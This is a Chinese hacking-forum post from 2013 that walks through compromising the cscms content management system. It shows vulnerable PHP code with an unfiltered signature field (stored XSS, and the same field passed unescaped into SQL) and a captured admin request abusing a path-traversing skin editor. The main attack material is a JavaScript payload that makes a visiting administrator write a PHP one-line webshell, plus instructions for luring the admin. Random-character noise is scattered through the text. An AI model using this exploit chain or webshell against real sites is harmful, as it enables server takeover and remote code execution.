|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题 D& I$ F" O8 ~% A# d1 r; _4 Q/ R
官网已经修补了,所以重新下了源码; K# _8 D9 |5 Y' o
因为 后台登入 还需要认证码 所以 注入就没看了。
: s& z7 O% X8 c w- ]4 A2 G存在 xss
7 y3 Z% G5 J3 ]( n$ | x$ j漏洞文件 user/member/skin_edit.php8 J" b+ L9 e5 o
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:/ O1 g' G9 O! Q! }4 e1 ~
/ q, q1 v6 e1 G
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
8 j: u7 U' F4 ?0 @1 ~7 k % T- N1 e8 ?0 l! G8 g: p2 I& c
</textarea></td></tr>
. j% q- M* _" a 7 R/ h! b1 G/ |
user/do.php ]% a" f0 F) y; n8 `
5 J$ H9 T! q6 S
$ V1 @1 D/ q( u7 h+ w1 Kif($op=='zl'){ //资料* Y6 C" p7 g7 `9 v8 R7 d- ~+ H. V
" O8 w9 b+ c3 Y/ K9 ^2 p if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
4 K! O. g8 p/ H, }6 |% P! i- a exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));- i- r) b# M( x* k, o
% W, i5 Y. t: I% h $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
$ ?, M6 P$ k# O! A9 T' M 1 o. K$ G \ V' N; G
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
7 d! A! T0 W8 C where CS_Name='".$cscms_name."'";
* y& [$ B4 V& x. g
2 d, |% M* S* s# a if($db->query($sql)){% t- J4 R0 `- L6 f
; p7 A3 B7 o) e; q& k exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));4 l1 s$ B( g' V2 f f8 S
! `7 T- C) p" T& j; e" }
}else{% U- H% T/ f9 G8 q: ?0 G
, O1 x! ?. F* o4 J$ s exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));: @7 i9 R9 K: k# e
, W8 u( F t8 s, m+ p- F }
( g! I# i+ n) h7 k" f' O3 q: ?; ^
* X% Q8 G- W; \2 F没有 过滤导致xss产生。7 W5 m" b6 S2 f% @* V
后台 看了下 很奇葩的是可以写任意格式文件。。
. ]( Q. u2 M- U# w a+ {3 \& [抓包。。1 H2 M/ g2 h" d; Q: [
) h1 n; ]# N0 I0 D0 u! w3 \( E6 ? ]! X
0 w- x1 L* d0 V本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
1 H7 F- J: \& p g( H! ~/ [2 n 6 K. i/ V2 f) n3 K
Accept: text/html, application/xhtml+xml, */*
$ d, L; X Z/ h# X
1 A1 }: Q2 P" E6 V, @/ CReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php: a2 B) e, I# Q0 t: S
8 W4 ]2 ~, p$ }5 e5 z8 wAccept-Language: zh-CN
0 d. ^6 g2 Q# `4 e! W
* b1 e2 b, W# aUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)# S7 o* h( B! m, ~# y
5 @1 d) ^0 m- C; ^* W- x7 Y* w6 Q( \
Content-Type: application/x-www-form-urlencoded" Q1 r! C+ i+ H
* N4 k+ o! Z& A. Z
Accept-Encoding: gzip, deflate
4 A# f6 i: X, b- s
7 T$ p. c, |! A7 j; S1 H! XHost: 127.0.0.1; T' V+ t" Q# P: k s6 b& {5 m
7 ]1 A4 O+ }& U! b* a% n
Content-Length: 38
) | _+ d, @7 K3 B' n / l, L, A" o* a8 F$ l4 k" |) @
DNT: 12 \& Z" `/ S* L9 r# f% O
% I9 Z) `4 N# c+ Z% k3 b& \Connection: Keep-Alive1 \% u! l9 \; Z5 q1 G" A! n
6 b) {! n ^( [% FCache-Control: no-cache$ j* A$ |3 Q# w2 c( h) g
9 M& k# ^! m4 u, @
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
, `9 q4 G- S3 ], Z
/ g+ ]) Q2 h3 K7 d& B" H7 t4 a/ D+ v
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
* F; h. J9 q8 J* S# K& i; i# |6 z" w3 e1 B* }- A3 b, U$ c2 B
" H0 J- U" a9 o4 n( U/ A
' x" F1 Y/ S: T; ~, g8 q于是 构造js如下。
! B% G# I# k4 ~) @: u! ?7 ^' H
) t7 p2 u5 X( O; U6 r本帖隐藏的内容<script> # [$ G- D$ ~7 f3 H) J% y. L
thisTHost = top.location.hostname;
3 n$ g7 m: }8 W+ d& Y8 n 5 A6 M$ C2 [) ], ?# @
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";2 O7 Z* x+ j! |6 E; @
7 I2 N; X: X4 O, S \
function PostSubmit(url, data, msg) {
9 ^9 D5 m7 B4 T' l; {0 R) f! D" X var postUrl = url;" |, A- O) _8 R3 |
( c' b6 k0 B: V& F+ ^1 O var postData = data;
* o& N2 {% f0 B( l/ v' \6 o" b var msgData = msg;
: v! d# L- G/ H6 h& B. \ var ExportForm = document.createElement("FORM"); s# e, D( C9 y* D2 y1 M) S
document.body.appendChild(ExportForm);
+ _ g; j+ L2 h7 x ExportForm.method = "POST";
" k8 d/ D' w3 x/ o. ? var newElement = document.createElement("input"); 3 H( N! }( y' s' m! D$ E
newElement.setAttribute("name", "name"); : x' q# k) y3 \. q' G) @
newElement.setAttribute("type", "hidden");
& {- E5 Y. H" q& s; D8 M" C, R3 } var newElement2 = document.createElement("input"); ( U) n0 Z2 Z- Z4 _
newElement2.setAttribute("name", "content"); ( |4 g* |/ @" e/ d
newElement2.setAttribute("type", "hidden"); 6 e" U* b, ~+ W
ExportForm.appendChild(newElement);
/ \( u$ f- p2 y; h) [ ExportForm.appendChild(newElement2); / _* a* ~& E S
newElement.value = postData;
* W# ]/ P) R( B4 {3 a9 }: C newElement2.value = msgData; ! @2 C! \: L* A, Z3 y* p
ExportForm.action = postUrl; 3 p2 k2 R! g/ n2 z; v0 {, s
ExportForm.submit();
7 S: H$ y# K( V% p, |' }};
1 j' Q7 c; W2 B, \, ^1 ?7 w 6 H" l7 E3 m* h8 h2 Y. x
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
, o4 y+ y9 G7 p& v) t 1 |% J# z1 G) @4 M. c7 {5 n
</script># ]2 h5 M2 N2 F& k0 d9 \( E4 i
. G8 e& w' p* ]$ W
+ L- A G" ^5 w$ U3 k; K! W
5 |8 e! n5 n4 A* c, T! W) I3 e6 Khttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
+ q3 d1 p1 k/ }: U( ?! c用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)2 S4 A+ d1 ~$ G( g5 p
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
, ~ g8 w0 N# ]' f- v( B
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对